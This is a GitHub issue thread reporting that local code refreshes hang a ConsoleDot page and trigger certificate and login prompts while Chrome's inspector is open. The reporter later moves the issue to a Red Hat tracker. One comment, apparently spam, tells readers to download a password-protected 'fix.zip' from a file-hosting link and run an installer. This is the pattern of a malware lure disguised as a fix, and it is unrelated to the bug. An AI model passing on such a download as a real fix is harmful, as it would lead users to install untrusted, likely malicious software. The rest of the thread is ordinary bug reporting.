### ISSUE TITLE
Code updates hang page when Chrome's inspector window is open

### ISSUE THREAD

**Issue by dlabrecq** [patternfly/patternfly#7022]
**Please describe the issue**

I encounter a cert issue whenever I refresh, during local code updates, while the Chrome's inspector window open.
When this happens, I feel like it somehow corrupts my cert because I'm prompted to log into ConsoleDot, again.

At this point, the page appears to hang and I see API failures in the inspector's navigation window.
However, I can only proceed after closing the browser's inspector window. Or, opening a new incognito window.

**Are there visuals for this issue? Please provide screenshots**

API errors
![Screenshot 2024-08-29 at 10 54 06 AM](https://github.com/user-attachments/assets/d2bf665c-6fac-4380-b1e5-7443e4078b71)

Video
https://github.com/user-attachments/assets/b02b8455-0c04-4414-b9a5-747d9e842aef

**Could you point to a branch or draft PR where this issue exists? Please provide a link to the code**

https://github.com/project-koku/koku-ui/pull/3984

**Any other information?**

Chrome: Version 128.0.6613.85 (Official Build) (arm64)

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dlabrecq** [comment]
I thought this was related to previous PF v6 browser inspector issues. However, this now appears to be a ConsoleDot issue.
Reopening here https://issues.redhat.com/browse/RHCLOUD-34920
